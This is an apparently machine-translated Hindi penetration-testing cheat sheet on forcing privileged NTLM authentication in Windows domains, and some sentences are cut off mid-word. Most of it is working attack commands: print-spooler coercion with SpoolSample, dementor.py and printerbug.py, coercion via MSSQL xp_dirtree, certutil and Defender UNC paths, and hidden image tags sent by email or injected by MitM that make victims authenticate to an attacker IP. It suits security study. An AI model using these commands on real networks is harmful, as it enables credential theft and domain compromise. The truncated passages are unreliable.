Force NTLM Privileged Authentication

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

SharpSystemTriggers

SharpSystemTriggers एक संग्रह है जिसमें रिमोट प्रमाणीकरण ट्रिगर हैं जो MIDL कंपाइलर का उपयोग करके C# में कोड किए गए हैं ताकि 3rd पार्टी निर्भरता से बचा जा सके।

Spooler Service Abuse

यदि प्रिंट स्पूलर सेवा सक्रिय है, तो आप AD क्रेडेंशियल का उपयोग करके डोमेन कंट्रोलर के प्रिंट सर्वर से नए प्रिंट जॉब्स पर **अपड

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

स्पूलर सेवाएं सुन रही हैं

एक थोड़ा सा संशोधित @mysmartlogin's (विन्सेंट ले टूक्स) SpoolerScanner का उपयोग करके देखें कि क्या स्पूलर सेवा सुन रही है:

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

आप लिनक्स पर rpcdump.py का उपयोग कर सकते हैं और MS-RPRN Protocol के लिए खोज कर सकते हैं।

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

किसी भी होस्ट के खिलाफ सेवा से प्रमाणीकरण करने के लिए सेवा से अनुरोध करें

आप यहाँ से SpoolSample को कंपाइल कर सकते हैं

SpoolSample.exe <TARGET> <RESPONDERIP>

या 3xocyte का dementor.py या printerbug.py का उपयोग करें अगर आप Linux पर हैं।

python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>

अनियंत्रित अनुमंडलन के साथ संयोजन

यदि किसी हमलावर ने पहले से ही अनियंत्रित अनुमंडलन के साथ किसी कंप्यूटर को कंप्रमाइज कर लिया है, तो हमलावर प्रिंटर को इस कंप्यूटर के खिलाफ प्रमाणीकरण करने के लिए सक्षम हो सकता है। अनियंत्रित अनुमंडलन के कारण, प्रिंटर के कंप्यूटर खाते का TGT अनियंत्रित अनुमंडलन वाले कंप्यूटर की मेमोरी में सहेजा जाएगा। क्योंकि हमलावर ने पहले से ही इस होस्ट को कंप्रमाइज कर लिया है, वह इस टिकट को पुनः प्राप्त कर सकेगा और इसका दुरुपयोग कर सकेगा (टिकट पास)।

RCP बल प्रमाणीकरण

PrivExchange

PrivExchange हमला एक दोष का परिणाम है जो एक्सचेंज सर्वर PushSubscription विशेषता में पाया गया है। यह विशेषता एक्सचेंज सर्वर को किसी भी डोमेन उपयोगकर्ता द्वारा बाधित करने की अनुमति देती है ताकि वह HTTP के माध्यम से किसी भी क्लाइंट द्वारा प्रदान किए गए होस्ट को प्रमाणीकृत कर सके।

डिफ़ॉल्ट रूप से, एक्सचेंज सेवा SYSTEM के रूप में चलती है और इसे अत्यधिक अधिकार (विशेष रूप से, **डोमेन पूर्व-2019 संचयी अपड

C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt

MSSQL

EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1

या इस दूसरी तकनीक का उपयोग करें: https://github.com/p0dalirius/MSSQL-Analysis-Coerce

Certutil

Certutil.exe lolbin (Microsoft-signed binary) का उपयोग करके NTLM प्रमाणीकरण को बलपूर्वक करना संभव है:

certutil.exe -syncwithWU  \\127.0.0.1\share

HTML इन्जेक्शन

ईमेल के माध्यम से

यदि आपके पास उस उपयोगकर्ता का ईमेल पता है जो आपके द्वारा कंप्रोमाइज़ करना चाहते हैं, तो आप उसे एक 1x1 छवि के साथ ईमेल भेज सकते हैं जैसे कि

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

MitM

यदि आप किसी कंप्यूटर पर MitM हमला कर सकते हैं और उस पेज में HTML इंजेक्ट कर सकते हैं जिसे वह देखेगा, तो आप पेज में निम्नलिखित तरह की छवि इंजेक्ट करने की कोशिश कर सकते हैं:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

NTLMv1 क्रैकिंग

अगर आप NTLMv1 challenges read here how to crack them को कैप्चर कर सकते हैं। ध्यान रखें कि NTLMv1 को क्रैक करने के लिए आपको रिस्पॉंडर चैलेंज को "1122334455667788" पर सेट करना होगा

Last updated